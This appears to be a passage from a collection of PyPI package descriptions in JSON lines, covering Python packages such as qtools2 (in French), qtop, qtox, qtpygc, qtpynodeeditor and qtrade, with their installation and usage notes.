...InstallationREMARQUE: les utilisateurs de Windows commencent par la sectionEtapes Sp\u00e9cifiques Windows. Ce package utilise une version modifi\u00e9e depyxformappel\u00e9epmaxformcar le projet PyXForm a jusqu'\u00e0 pr\u00e9sent refus\u00e9 d'accepter les demandes d'extraction de cet auteur pour certaines am\u00e9liorations simples. 
Par cons\u00e9quent, l'installation n\u00e9cessitedeuxcommandes au lieu d\u2019une. Ouvrez CMD ou Terminal et installez les packages pertinentss\u00e9par\u00e9mentetdans l'ordrePremi\u00e8rementpip installer https://github.com/jkpr/pmaxform/zipball/masterDeuxi\u00e8mementpip installer https://github.com/jkpr/QTools2/zipball/masterPour les plus r\u00e9cents et les meilleurs, remplacez \u00abmaster\u00bb dans les URL ci-dessus par \u00abdeveloper\u00bb.UsageApr\u00e8s l'installation, le code capable de convertir des XLSForms est enregistr\u00e9 dans la biblioth\u00e8que de codes de Python. Cela signifie que n'importe o\u00f9 on peut acc\u00e9der \u00e0 Python, ains qu\u2019aqtools2.Pour utiliserqtools2, il y a deux mani\u00e8res principales. La m\u00e9thode la plus simple consiste \u00e0 pointer et \u00e0 cliquer sur un fichier sp\u00e9cifique ([exemple de fichier sp\u00e9cifique]5) enregistr\u00e9 dans n\u2019importe quel dossier, tel que Downloads, pour que Python puisse l\u2019ex\u00e9cuter. L'autre fa\u00e7on consiste \u00e0 utiliser la ligne de commande.Meilleure mani\u00e8re d'utiliserqtools2pour les formulaires PMA2020Le moyen le plus simple d'utiliserqtools2est d'utiliser un fichier du dossierscripts[de ce r\u00e9f\u00e9rentiel]6. Pour t\u00e9l\u00e9charger un script, cliquez sur son lien, puis sur \"Raw\", puis enregistrez le contenu (dans le navigateur, File> Save). Le tableau ci-dessous explique ce qui est disponible.Nom du scriptButxlsform-convert.pyConvertir un ou plusieurstypesde XLSForm avec une interface graphique.Windows associe g\u00e9n\u00e9ralement les fichiers.py\u00e0 l'ex\u00e9cutable Python. Ainsi, un utilisateur Windows ne devrait avoir besoin que de double-clic sur l'ic\u00f4ne du fichier de script. Cela d\u00e9marre l\u2019interpr\u00e9tre Python et lance le code.\n\u00a0\nSur un Mac, faire un double-clic sur un fichier.pyouvre g\u00e9n\u00e9ralement un correcteur de texte. Pour ex\u00e9cuter le fichier en tant que code, faire un clic droit sur l'ic\u00f4ne du fichier de script, puis s\u00e9lectionnez \"Ouvrir avec> Python Launcher (2.7.12)\". Le num\u00e9ro de version Python peut \u00eatre diff\u00e9rent.AlternativeSi ce qui pr\u00e9c\u00e8de est trop difficile, il est possible d\u2019obtenir la m\u00eame fonctionnalit\u00e9 d\u2019une mani\u00e8re diff\u00e9rente. Ouvrez une session interactive Python (peut-\u00eatre ouvrir IDLE, peut-\u00eatre ouvrir Terminal et taperpython). Ensuite, copiez et collez le m\u00eame texte qui se trouve dans le script souhait\u00e9 dans l'interpr\u00e8te, appuyez sur \"Enter\", et le tour est jou\u00e9.Utilisation de la ligne de commandeEn plus d'\u00eatre le bourreau du travail deqtools2, le moduleqtools2.convertfournit \u00e9galement un utilitaire de ligne de commande. La liaison de style nouveau (avec toutes les instructions contenues dans le XLSForm) est maintenant la valeur par d\u00e9faut. La liaison de type ancien (instructions d\u2019\u00e9dition XML manuelle, ligne par ligne) est supprim\u00e9e. 
Pour voir les fichiers d\u2019aide et leur utilisation, ex\u00e9cutez-le dans le terminal.python -m qtools2.convert --helpGuide de d\u00e9marrage rapideType de conversionCommandeConversion de formulaire PMApython -m qtools2.convert FILENAME [FILENAME ...]convertir et valider des \u00e9quivalents de XLSForm-Offline,python -m qtools2.convert -ril FILENAME [FILENAME ...]OptionsDrapeau courtDrapeau longDescription-r--regularCet indicateur indique que le programme doit convertir en XForm et ne pas essayer d\u2019apporter des modifications sp\u00e9cifiques \u00e0 PMA2020.-p--preexistingIncluez cet indicateur (drapeau) pour emp\u00eacher le remplacement de fichiers pr\u00e9existants.-n--novalidateNe validez pas la sortie XML avec ODK Validate. N'effectuez pas de contr\u00f4les suppl\u00e9mentaires sur (1) les donn\u00e9es de colonnes ind\u00e9finies, (2) les r\u00e9f\u00e9rences de variables en d\u00e9sordre.-i--ignore_versionIgnorez le versioning dans filename, form_id, form_title et save_form. En d'autres termes, ceci permet par d\u00e9faut d'assurer la coh\u00e9rence de la version.-l--linking_warnProduire des avertissements pour les directives de liaison incorrectes. Par d\u00e9faut, une exception est d\u00e9clench\u00e9e et le programme est arr\u00eat\u00e9.-d--debugAfficher les informations de d\u00e9boggage. Utiliser pour \u00e9craser les bugs.-e--extrasEffectuez des v\u00e9rifications suppl\u00e9mentaires sur (1) les donn\u00e9es dans des colonnes non d\u00e9finies et (2) les r\u00e9f\u00e9rences de variables en d\u00e9sordre.-s--suffixUn suffixe \u00e0 ajouter au nom du fichier de base. Impossible de commencer par un trait d'union (\"-\").Interface utilisateur graphiquePour ceux qui souhaitent utiliser une interface graphique lanc\u00e9e \u00e0 partir de la ligne de commande., Le pipeline QTools2 commence ainsipython -m qtools2et v\u00e9rifiez l\u2019utilisation en ajoutant l\u2019indicateur--help\u00e0 la commande ci-dessus.NOTE: l'option-v2a \u00e9t\u00e9 supprim\u00e9e \u00e0 partir de la version 0.2.3.Mises \u00e0 jourREMARQUE: les utilisateurs de Windows commencent par la section _ ** Etapes sp\u00e9cifiques Windows ** _. Pour installer les mises \u00e0 jourqtools2, utilisezpip installer https://github.com/jkpr/QTools2/zipball/master --upgradePour les plus r\u00e9centes et les meilleures, remplacez \u00abmaster dans les URL ci-dessus par \u00abdeveloper\u00bb.Suggestions et pi\u00e8gesV\u00e9rifiez la version dans le terminal pour voir si un programme est install\u00e9.V\u00e9rifier la version de Java avecjavac -versionV\u00e9rifiez la version de Python avecpython -V.V\u00e9rifiez la version de pip avecpip -V.Un autre ex\u00e9cutable pour Python estpython2.Un autre ex\u00e9cutable pourpipestpip2.La version la plus r\u00e9cente de Java n'est pas requise, mais les tests r\u00e9ussis ont uniquement \u00e9t\u00e9 ex\u00e9cut\u00e9s avec Java 1.6 \u00e0 Java 1.8.Une d\u00e9pendance depmaxformestlxml, ce qui peut poser probl\u00e8me sur Mac. S'il y a des probl\u00e8mes, le meilleur guide est sur [StackOverflow]8.Lors de l'installation depmaxformsur Mac, l'utilisateur peut \u00eatre invit\u00e9 \u00e0 installer les outils de ligne de commande de Xcode. Cela devrait suffire pourlxml.Qtools2 peut fonctionner sans Java. 
Java n\u2019est n\u00e9cessaire que pour ODK Validate, qui peut \u00eatre contourn\u00e9 en utilisant l\u2019option \"No validate\".BugsSoumettez les rapports de bugs \u00e0 James Pringle \u00e0 l'adressejpringleBEAR @ jhu.edu."} +{"package": "qtooth", "pacakge-description": "No description available on PyPI."} +{"package": "qtop", "pacakge-description": "qtop: the fast text mode way to monitor your cluster\u2019s utilization and\nstatus; the time has come to take back control of your cluster\u2019s\nscheduling businessPython port by Sotiris Fragkiskos / Original bash version by Fotis\nGeorgatosSummaryExampleqtop.py is the python rewrite of qtop, a tool to monitor Torque, PBS,\nOAR or SGE clusters, etc. This release provides for theinstant replayfeature, which is handy for debugging scheduling mishaps as they occur.\nqtop is and will remain a work-in-progress project; it is intended to\nbe built upon and extended - please come along ;)This is an initial release of the source code, and work continues to\nmake it better. We hope to build an active open source community that\ndrives the future of this tool, both by providing feedback and by\nactively contributing to the source code.This program is currently in pre-release mode, with experimental features. If it works, peace :)InstallationTo install qtop, you can either dogit clone https://github.com/qtop/qtop.git\ncd qtop\n./qtop --versionorpip install qtop --user ## run it without --user to install it as root\n$HOME/.local/bin/qtop --versionUsageTo run a demo, just run./qtop -b demo -FGTw ## show demo, -F for full node names, -T to transpose the matrix, -G for full GECOS field, and -w for watch modeOtherwise, for daily usage you can run./qtop -b sge -FGw ## replace sge with pbs or oar, depending on your setup (this is often picked up automagically)Try--helpfor all available options.DocumentationDocumentation/tutorialhere.ProfileDescription: the fast text mode way to monitor your cluster\u2019s utilization and status; the time has come to take back control of your cluster\u2019s scheduling business\nLicense: MIT\nVersion: 0.9.20161222 / Date: 2016-12-22\nHomepage: https://github.com/qtop/qtop"} +{"package": "qtopic", "pacakge-description": "qtopicA Python module to fetch and parse data Topic related data from Quora.InstallationInstall using pip:pip install qtopicUsagefrom qtopic import QTopicbest_questions = QTopic.get_best_questions (\u2018Computer-Programming\u2019)#do stuff with the parsed databest_questions[\u2018links\u2019]best_questions[\u2018title\u2019]best_questions[\u2018published\u2019]FeaturesCurrently implementedFollower CountSome followers nameRelated TopicsFeed last updatedBest questionsTop Storiesbreaked down links, title, published.Open questionbreaked down links, title, published.TodoInformation to be stored in a better way."} +{"package": "qtorch", "pacakge-description": "No description available on PyPI."} +{"package": "qtorch-plus", "pacakge-description": "QPytorch+: Extending Qpytorch for Posit format and moreAuthor: minhhn2910@github, himeshi@githubInstallInstall in developer mode:gitclonehttps://github.com/minhhn2910/QPyTorch.gitcdQPyTorch\npipinstall-e./Simple test if c-extension is working correctly :python test.pyImportant: if there are errors when running test.py, please export the environment variables indicating build directory and/or CUDA_HOME, otherwise we will have permission problem in multi-user-server.export TORCH_EXTENSIONS_DIR=/[your-home-folder]/torch_extension\nexport CUDA_HOME=/[your cuda instalation 
directory e.g. /usr/local/cuda-10.2] \npython test.pyFunctionality:SupportPosit Formatwith round to nearest mode.Scaling of value before & after conversion to/from posit is supported (Exponent bias when the scale is a power of 2).For example:value x -> x*scale -> Posit(x*scale) -> xSupport Tanh approximation with Posit and correction of error:Whenxis in a posit format with es = 0 =>Sigmoid(x) = (x XOR 0x8000) >> 2 => PositTanh(x) = 2 \u00b7 Sigmoid(2x) \u2212 1More number formats (Table lookup, log2 system ..., and new rounding modes will be supported on new versions).Currently under development and update to support more number formats and schemes.Demo and tutorial:Approximate Tanh Function with Posit is presented atexamples/tutorial/test_posit_func.ipynbMost functionalities can be tested by using the notebooks in posit tutorials: ./examples/tutorial/Notebook demo training Cifar10 with vanilla Posit 8 bit:examples/tutorial/CIFAR10_Posit_Training_Example.ipynbDemo of DCGAN Cifar10 training with Posit 8 bit:Google Colab LinkDemo of DCGAN Lsun inference using Posit 6 bit and Approximate Tanh :Google Colab LinkDemo of applying posit 6 bits & 8 bits toALBERTfor Question Answering Task:GoogleColab DemoIf you find this repo useful, please cite our paper(s) listed below. The below also explain the terms and usage of Posit's enhancements (exponent bias and tanh function).@inproceedings{ho2021posit,\n title={Posit Arithmetic for the Training and Deployment of Generative Adversarial Networks},\n author={Ho, Nhut-Minh and Nguyen, Duy-Thanh and De Silva, Himeshi and Gustafson, John L and Wong, Weng-Fai and Chang, Ik Joon},\n booktitle={2021 Design, Automation \\& Test in Europe Conference \\& Exhibition (DATE)},\n pages={1350--1355},\n year={2021},\n organization={IEEE}\n}The original Qpytorch package which supports floating point and fixed point:The original README file is in REAME.original.mdCredit to the Qpytorch team and their original publication@misc{zhang2019qpytorch,\n title={QPyTorch: A Low-Precision Arithmetic Simulation Framework},\n author={Tianyi Zhang and Zhiqiu Lin and Guandao Yang and Christopher De Sa},\n year={2019},\n eprint={1910.04540},\n archivePrefix={arXiv},\n primaryClass={cs.LG}\n}Qpytorch TeamTianyi ZhangZhiqiu LinGuandao YangChristopher De Sa"} +{"package": "qtorch-posit", "pacakge-description": "Extended version of QPytorchAuthor: minhhn2910@github, himeshi@githubMigration and change of package nameWe have developed multiple new funcionalities and have published the updated version under the new name: qtoch-plus.The new version supports arbitrary number of bit for posit (instead of only 16,8,6,4 bitwidth are supported in this version). We also support crafting customized number format with no restriction on the number of bit and the generating rules. More details on our github and in the new pip page:https://pypi.org/project/qtorch-positThis is developed based on the original QPyTorch package. 
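As a rough illustration of the tanh shortcut quoted in the qtorch-plus notes above (PositTanh(x) = 2 · Sigmoid(2x) − 1), here is a small float-level sketch. It only checks the mathematical identity with numpy; the posit-specific bit trick ((x XOR 0x8000) >> 2 on the 16-bit, es = 0 encoding) is not reproduced here, and the function name below is illustrative rather than part of the package API.

```python
import numpy as np

def tanh_via_sigmoid(x):
    # tanh(x) = 2 * sigmoid(2x) - 1, the identity behind the posit fast-tanh path.
    # The actual posit shortcut replaces sigmoid() with (bits XOR 0x8000) >> 2
    # on the raw 16-bit, es = 0 encoding; that step is not shown here.
    sigmoid_of_2x = 1.0 / (1.0 + np.exp(-2.0 * x))
    return 2.0 * sigmoid_of_2x - 1.0

x = np.linspace(-4.0, 4.0, 9)
# The identity is exact up to floating-point rounding, so this prints ~1e-16.
print(np.max(np.abs(tanh_via_sigmoid(x) - np.tanh(x))))
```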
The below is the original README file and acknowlegementOriginal Qpytorch:Original QPyTorch teamTianyi ZhangZhiqiu LinGuandao YangChristopher De Sa"} +{"package": "qtox", "pacakge-description": "qtoxcreates Bash scripts that simply run the same commands Tox would run but in parallel for each environment.This can lead to a massive speed-up in your daily local workflow.BenchmarksI cloned theFalcon web API framework, rantoxonce, and commented out the scripttools/clean.sh(which error\u2019d out when the unit tests for Python 27 and 36 were run in parallel).Following that, here\u2019s the output oftime toxtook:real 1m9.746s\nuser 1m18.527s\nsys 0m4.732sI then created a bash script usingqtox-epep8 py27 py36 docs > retox.sh. Here\u2019s the output oftime ./retox.sh:real 0m40.326s\nuser 1m28.318s\nsys 0m3.717sSoqtox\u2019s script ran in 57% the time.Installingqtoxis available on PyPi.If you usepipsiyou can install it with:pipsi install qtoxIf you\u2019re some kind of crazy person who likes polluting your global Python instance you can just callpip install qtoxand I\u2019ll try not to judge you.NoteThe version of tail on OSX doesn\u2019t have the--pidoption, so you\u2019ll need to install it withbrew install coreutils. Scripts generated on osx callgtailinstead oftailfor this reason.Why you shouldn\u2019t call Tox from your dev boxTox is great for making sure tests run a truly isolated environment on a CI platform, but if you\u2019re just trying to run flake8 or the unit tests for the hundredth time today it can be overkill.Tox appears to do a lot of house work before running even the simplest commands. Anecdotally, I\u2019ve always noticed a huge speed improvement when I simply ran a command in the virtualenv tox set up (say,.tox/py27/bin/pytest mypkg) versus when I invoked Tox directly (tox-epy27).The speed savings were significant enough that I ended up writing Bash scripts to run the Tox commands and used that instead of Tox, which always ended up being faster according totime. On the downside, these scripts obviously duplicated information already found in thetox.inifile and often became out of date.The rise of truly amazing static analysis tools in Python such asMyPyexacerbate the problems I see running invoking Tox compared to manually crafting scripts. Tools like MyPy offer the most value when they\u2019re run continuously as development happens. 
However, because MyPy checks are often put in separate tox environment, it\u2019s easy for people focused on a different problem (say, fixing a unit test) to run only those environments for minutes or hours before they remember to check MyPy, and be left needing to fix a bunch of type errors after they\u2019re convinced they\u2019ve already made their program work at runtime.The best solution is to just run everything as often as possible.qtoxenables this.How to use qtoxImagine a tox file that:formats your code withBlackchecks it withFlake8checks it with MyPyruns unit tests in Python 3.5 and 3.6Note: tox needs to run one time beforeqtoxcan be used, in order for qtox to determine if command line tools are present in the virtualenv\u2019s or if they should be checked for in the Tox\u2019swhitelist_externalssetting.qtoxdoesn\u2019t replace Tox, it just lets you augment it with the ability to re-run it\u2019s commands faster.qtoxcan be used to create a bash script like so:qtox-eblackpep8mypypy35p36>retox.shchmod+xretox.shWhen this script will instantly launch five jobs in parallel and wait on the results in the order you specified (meaning you want the quicker jobs- such as black or flake8- to run first).As it works it\u2019s way through the list, it shows the output of each job in real time. So in this example, blacks output would be seen as it happens, and when black finishes all of flake8\u2019s output that happened in the interim will be shown before it\u2019s current output is displayed, etc.It does this by having every job redirect to a file. When it\u2019s time to consume the results of that job,tailis invoked in another job, which reads from the start of the file and follows it until the process writing to it dies.If a job fails, all other subsequent jobs are simply killed without printing out their output. This keeps things simpler so you don\u2019t have to scroll back up to see what went wrong.It\u2019s up to you to make sure the simpler jobs are put earlier in the list you give toqtox. If you instead put the longer running jobs first, you\u2019ll have to wait for them to finish before seeing feedback from quicker tools such as flake8.Multi Tox Super Projectsqtoxalso supports creating bash scripts for multiple tox projects.Use the-cflag to specify a tox directory, then use-elike normal.Say you have two directories containing two Python projects, both using tox. One is calledacme-lib, and is a reusable library containing core business logic, while the other isacme-rest-api, which usesacme-lib. If you\u2019re working on both at the same time, you may want to simply run all of the Tox tests together, starting with Flake 8 and MyPy tests first.Generating a bash script for that would look something like this:qtox-cacme-lib-epep8mypy-cacme-rest-api-epep8mypy-cacme-lib-epytest-cacme-rest-api-epytest>retox.shchmod+x./retox.shThe tasks that will be waited on / shown the progress for will be in this order:acme-lib\u2019s pep8 and mypy checksacme-rest-api\u2019s pep8 and mypy checksacme-lib\u2019s pytest testsacme-rest-api\u2019s pytest testsTo beat a dead horse, I\u2019ll reiterate that all of these tasks will start simultaneously, meaning the relatively expensive REST API unit tests will start running at the same time as everything else. 
The simpler checks will simply be waited on first."} +{"package": "qtp", "pacakge-description": "No description available on PyPI."} +{"package": "qtpad", "pacakge-description": "No description available on PyPI."} +{"package": "qtpandas", "pacakge-description": "Utilities to use pandas (the data analysis/manipulation library for Python) with Qt.Home-page: https://github.com/draperjames/qtpandasAuthor: Matthias Ludwig, Marcel Radischat, Zeke, James DraperAuthor-email: james.draper@duke.eduLicense: MIT LicenseDescription: # QtPandas### Utilities to use [pandas](https://github.com/pandas-dev/pandas) (the data analysis/manipulation library for Python) with Qt.## Project Information
Badges: Latest Release, Package Status, Build Status, PyPI
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/795dad8f6dfd4697ab8474265c4d47cb)](https://www.codacy.com/app/james-draper/qtpandas?utm_source=github.com&utm_medium=referral&utm_content=draperjames/qtpandas&utm_campaign=Badge_Grade)[![Join the chat at https://gitter.im/qtpandas/Lobby#](https://badges.gitter.im/qtpandas/lobby.svg)](https://gitter.im/qtpandas/Lobby#)[![open issues](https://img.shields.io/github/issues-raw/draperjames/qtpandas.svg)](https://github.com/draperjames/qtpandas/issues)[![closed issues](https://img.shields.io/github/issues-closed/draperjames/qtpandas.svg)](https://github.com/draperjames/qtpandas/issues)## Requirements;> Python 3.4 or greater> Pthon 2.7 or greater> PyQt4## InstallTo install run the following in the command prompt;```pip install qtpandas```If that doesn't work try installing the lastest version of easy gui;```pip install --upgrade git+https://github.com/robertlugg/easygui.git```If that doesn't work then please [report an issue](https://github.com/draperjames/qtpandas/issues)To use, create a new Python script containing the following:```from PyQt4.QtCore import *from PyQt4.QtGui import *from qtpandas.views.CSVDialogs import CSVImportDialogif __name__ == \"__main__\":from sys import argv, exitapp = QApplication(argv)dialog = CSVImportDialog()dialog.show()app.exec_()```# ExamplesThese can be found in QtPandas/examples.- BasicExmple.py![basic](images/BasicExample_screen_shot.PNG)- Here is TestApp.py![testapp](images/TestApp_screen_shot.PNG)# Development## Wanna contribute?Any feedback is apprecaited.- Report an issue- Check out the wiki for development info (coming soon!)- Fork us.Forked from @datalyze-solutions's [master](https://github.com/datalyze-solutions/pandas-qt).Platform: anyClassifier: Programming Language :: PythonClassifier: Development Status :: 4 - BetaClassifier: Natural Language :: EnglishClassifier: Environment :: X11 Applications :: QtClassifier: Intended Audience :: DevelopersClassifier: License :: OSI Approved :: MIT LicenseClassifier: Operating System :: OS IndependentClassifier: Topic :: Software Development :: Libraries :: Python ModulesClassifier: Topic :: Software Development :: User Interfaces"} +{"package": "qtpip", "pacakge-description": "Qt pipThis project aims to provide a wrapper aroundpip, but handling the Qt\naccount authentication for installing commercial wheels.The expected behavior is to detect thepipcommand from a /hopefully/\nactivated virtual environment, falling back to all the commands, but not for\nthe install.Installpip install qtpipUsageqtpip install pyside6IssuesMajor tasks and discovered use-cases that need to be implemented need to have\na JIRA entry, using theQt pipcomponent.\nYou can open anissue here."} +{"package": "qtpi_short", "pacakge-description": "#short qtpi"} +{"package": "qtpi-test-kernel", "pacakge-description": "_kernelqtpi_test_kernelis an example of a modified Jupyter kernel python wrapper to\nenable inputs written in Qtpi quantum language. 
This repository complements the\ndocumentation on wrapper kernels here:http://jupyter-client.readthedocs.io/en/latest/wrapperkernels.htmlInstallationUser has to ensure that Python language is installed on the machine.User has to install package manager :pipin case of Python 2 orpip3in case of Python 3.Here are 2 options which depends on the previous installation -To installqtpi_test_kernelfrom PyPI usingPython 2::pip install qtpi_test_kernel\npython -m qtpi_test_kernel.installTo installqtpi_test_kernelfrom PyPI usingPython 3::pip3 install qtpi_test_kernel\npython3 -m qtpi_test_kernel.installUsing the Qtpi kernelNotebook: TheNewmenu in the notebook should show an option for an Qtpi notebook.Console frontends: To use it with the console frontends, add--kernel qtpito\ntheir command line arguments."} +{"package": "qtplot", "pacakge-description": "No description available on PyPI."} +{"package": "qtplotlib", "pacakge-description": "Copyright (c) 2019 J\u00e9r\u00e9mie DECOCK (www.jdhp.org)Web site:http://www.jdhp.org/software_en.html#qtplotlibOnline documentation:http://qtplotlib.readthedocs.orgExamples:http://qtplotlib.readthedocs.org/gallery/Notebooks:https://github.com/jeremiedecock/qtplotlib-python-notebooksSource code:https://github.com/jeremiedecock/qtplotlib-pythonIssue tracker:https://github.com/jeremiedecock/qtplotlib-python/issuesQtPlotLib on PyPI:https://pypi.org/project/qtplotlibQtPlotLib on Anaconda Cloud:https://anaconda.org/jdhp/qtplotlibDescriptionPlotting with Python and QtNote:This project is still in beta stage, so the API is not finalized yet.DependenciesPython >= 3.0InstallationGnu/LinuxYou can install, upgrade, uninstall QtPlotLib with these commands (in a\nterminal):pip install --pre qtplotlib\npip install --upgrade qtplotlib\npip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:python3 setup.py installWindowsYou can install, upgrade, uninstall QtPlotLib with these commands (in acommand prompt):py -m pip install --pre qtplotlib\npy -m pip install --upgrade qtplotlib\npy -m pip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:py setup.py installMacOSXYou can install, upgrade, uninstall QtPlotLib with these commands (in a\nterminal):pip install --pre qtplotlib\npip install --upgrade qtplotlib\npip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:python3 setup.py installDocumentationOnline documentation:http://qtplotlib.readthedocs.orgAPI documentation:http://qtplotlib.readthedocs.org/en/latest/api.htmlExample usageTODOBug reportsTo search for bugs or report them, please use the QtPlotLib Bug Tracker at:https://github.com/jeremiedecock/qtplotlib-python/issuesLicenseThis project is provided under the terms and conditions of theMIT License."} +{"package": "qtpyeditor", "pacakge-description": "No description available on PyPI."} +{"package": "qtpygc", "pacakge-description": "qtpygcAre you experiencing strange segfaults in your large multithreaded Qt program at seemingly random times? Maybe even data corruption?It might be because both PyQt and PySide have a longstanding bug that may never be fixed. This bug is the result of three things:Manipulating Qt objects is generallynotthread-safe. The only thread that can safely access a Qt object is the one thatownsthat objects. Deleting an object isespeciallynot safe. Almost all Qt objects are GUI objects and are owned by the GUI thread.Qt objects are generally arranged in a tree and are deleted manually, at least when coding in C++. 
In Python however, Qt objectscanget garbage-collected when they are no longer referenced. It is easy to create reference cycles, and Python willeventuallycollect such objects when the garbage collector runs.In CPython, garbage collection may run at any timeand from any thread. Typically this happens in threads that allocate and free a lot of objects, which is usually background threads (not the main GUI thread).This means that the garbage collector may run in a background thread and accidentally deallocate a GUI object that is owned by the GUI thread. QObject destruction is not thread-safe, so this results in anything from weird corruption to crashes.This module implements theworkaroundsuggested by Kovid Goyal on the PyQt mailing list: disable automatic garbage collection and periodically run garbage collection manually in the main (Qt GUI) thread.This isnota complete workaround: if you create QObjects in threads other than the GUI thread, you can still get a crash when the GUI thread runs the GC and destroys such objects. You must ensure that objects created in other threads are manually destroyed (for example usingdeleteLater).DependenciesWe try to keep dependencies light:QtPyabstraction layer for PyQt/PySideHeapDictexcellent heap-based priority queue module (88 LoC)To run the tests, you'll needpytest. In particular,tests/test_crash.pychecks that Qt crashes if the workaround in this module isn't active.ExamplesTypical usage would be something like:fromqtpy.QtWidgetsimportQApplicationfromqtpygcimportGarbageCollector# you should only ever create one instance of thisgaco=GarbageCollector()app=QtWidgets.QApplication(sys.argv)# start a timer inside the main Qt thread that collects garbagewithgaco.qt_loop():# run event loop (use app.quit() to exit)app.exec_()If you are running a tight Python loop that creates a lot of cyclic garbage, you can manually trigger a garbage collection if needed:whilesome_condition:do_stuff_that_generates_garbage()# check if the garbage collector should run and signal the GUI thread to run it if necessarygaco.maybe_collect_threadsafe()Alternatively, you can temporarily decrease the GC timer interval:# while inside the \"with\" block, check if the GC needs to be run every hundredth of a secondwithgaco.gc_interval_threadsafe(0.01):do_stuff_that_generates_a_lot_of_garbage()"} +{"package": "qtpygraph", "pacakge-description": "A pythonic interface to theQtGraphics View Framework usingqtpy."} +{"package": "qtpyinheritance", "pacakge-description": "Prototype qtpy inheritance-related tools"} +{"package": "qtpy-led", "pacakge-description": "qtpy_ledSimple LED widget for QtPy.Forked frompyqt_ledby Neur1n and modified to work with QtPy.Table of ContentsInstallationUsageTipsLicenseInstallationpip$ pip install qtpy-ledpoetry$ poetry installUsageThe following example is also provided in the package, and will result in the screenshots shown above.fromqtpy.QtCoreimportQtfromqtpy.QtWidgetsimportQApplicationfromqtpy.QtWidgetsimportQGridLayoutfromqtpy.QtWidgetsimportQWidgetfromqtpy_ledimportLedimportnumpyasnpimportsysclassDemo(QWidget):def__init__(self,parent=None):QWidget.__init__(self,parent)self._shape=np.array([\"capsule\",\"circle\",\"rectangle\"])self._color=np.array([\"blue\",\"green\",\"orange\",\"purple\",\"red\",\"yellow\"])self._layout=QGridLayout(self)self._create_leds()self._arrange_leds()defkeyPressEvent(self,e):ife.key()==Qt.Key_Escape:self.close()def_create_leds(self):forsinself._shape:forcinself._color:exec('self._{}_{}= Led(self, on_color=Led.{},\\shape=Led.{}, 
build=\"debug\")'.format(s,c,c,s))exec(\"self._{}_{}.setFocusPolicy(Qt.NoFocus)\".format(s,c))def_arrange_leds(self):forrinrange(3):forcinrange(6):exec(\"self._layout.addWidget(self._{}_{},{},{}, 1, 1,\\Qt.AlignCenter)\".format(self._shape[r],self._color[c],r,c))c+=1r+=1app=QApplication(sys.argv)# type: ignoredemo=Demo()demo.show()sys.exit(app.exec_())TipsIf you want to be able to toggle the LED, then either usesetEnable(True)or pass an empty string to thebuildargument in Led.Thestatus_changedsignal will emit a boolean when the LED's state has changed.Currently, the only way to shrink the LED beyond the default size is to usesetFixedSizeLicenseMIT License. Copyright (c) 2023 crash8229."} +{"package": "qtpynodeeditor", "pacakge-description": "qtpynodeeditorPython Qt node editorPure Python port ofNodeEditor,\nsupporting PyQt5 and PySide throughqtpy.RequirementsPython 3.6+qtpyPyQt5 / PySideDocumentationSphinx-generated documentationScreenshotsStyle exampleCalculator exampleInstallationWe recommend using conda to install qtpynodeeditor.$ conda create -n my_new_environment -c conda-forge python=3.7 qtpynodeeditor\n$ conda activate my_new_environmentqtpynodeeditor may also be installed using pip from PyPI.$ python -m pip install qtpynodeeditor pyqt5Running the TestsTests must be run with pytest and pytest-qt.$ pip install -r dev-requirements.txt\n$ pytest -v qtpynodeeditor/tests"} +{"package": "qtpyt", "pacakge-description": "# pyqtA quantum transport library based on the non equilibrium Green\u2019s function (NEGF) formalism written in Python.## Getting StartedThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.### Prerequisites> Asehttps://wiki.fysik.dtu.dk/ase/> numpyhttps://github.com/numpy### Installingpip install qtpyt## Running the testspytest subfolder/tests### Upload# change version number.twine upload \u2013repository testpypi dist/qtpyt-0.0.tar.gz### Registerpython setup.py sdist### Build Cythonpython setup.py build_ext \u2013inplace### Install developpip install -e ."} +{"package": "qtpyvcp", "pacakge-description": "QtPyVCP - QtPy Virtual Control PanelQtPyVCP is a Qt and Python based framework for building virtual control panels\nfor the LinuxCNC machine control.The goal is to provide a no-code, drag-and-drop system for making simple VCPs,\nas well as a straightforward, flexible and extensible framework to aid in\nbuilding complex VCPs.Installation and UsageSee thedocumentation.DevelopmentGitHub RepoIssue TrackerDocumentation and HelpDocumentationLinuxCNC ForumFreenode IRC(#hazzy) (Issues joining? please try other network)The Matrix(#qtpyvcp:matrix.org)Gitter(Issues joining? please try other network)DiscordDependanciesLinuxCNC 2.8^ or masterPython 2.7PyQt5 or PySide2QtPyVCP is developed and tested using the LinuxCNC Debian 9 and 10 x64 (stretch and buster)Live ISO. It should run\non any system that can have PyQt5 installed, but Debian 9 and 10 x64 is the only OS\nthat is officially supported.DISCLAIMERTHE AUTHORS OF THIS SOFTWARE ACCEPT ABSOLUTELY NO LIABILITY FOR\nANY HARM OR LOSS RESULTING FROM ITS USE. IT ISEXTREMELYUNWISE\nTO RELY ON SOFTWARE ALONE FOR SAFETY. Any machinery capable of\nharming persons must have provisions for completely removing power\nfrom all motors, etc, before persons enter any danger area. 
All\nmachinery must be designed to comply with local and national safety\ncodes, and the authors of this software can not, and do not, take\nany responsibility for such compliance.This software is released under the GPLv2."} +{"package": "qt-qtemplate", "pacakge-description": "# Python QTemplate\nSimple but powerful QT template language for PySide6."} +{"package": "qtrace", "pacakge-description": "No description available on PyPI."} +{"package": "qtrade", "pacakge-description": "QtradeThis is a very basic Python 3.8+ wrapper for theQuestrade API, a Canadian low cost broker.InstallationThis package is available viaPyPIand can be installed via the commandpip install qtradeUsageFor an overview of the package API, please take a look at thedocs. The main class of the package is calledQuestradeand houses most of the functionality provided by the package. Below are a few examples for possible use cases.Token managementThe central class can be initialized viafromqtradeimportQuestradeqtrade=Questrade(access_code='')whereis the token that one gets from the Questrade API portal. It is calledaccess_codesince this initial token is used to get the full token data that will include{'access_token':,'api_server':'','expires_in':1234,'refresh_token':,'token_type':'Bearer'}The first call initializes the class and the second call gets the full token.Another way to initialize the class is to use a token yaml-file via:qtrade=Questrade(token_yaml='')where the yaml-file would have the general formaccess_token:api_server:expires_in:1234refresh_token:token_type:BearerIf the token is expired, one can useqtrade.refresh_access_token(from_yaml=True)to refresh the access token using the saved refresh token.Once the tokens are set correctly, I have currently added methods to get ticker quotes, the\ncurrent status of all positions in any Questrade account that is associated with the tokens,\nany account activities such as trades and dividend payments as well as historical data for\ntickers that are supported by 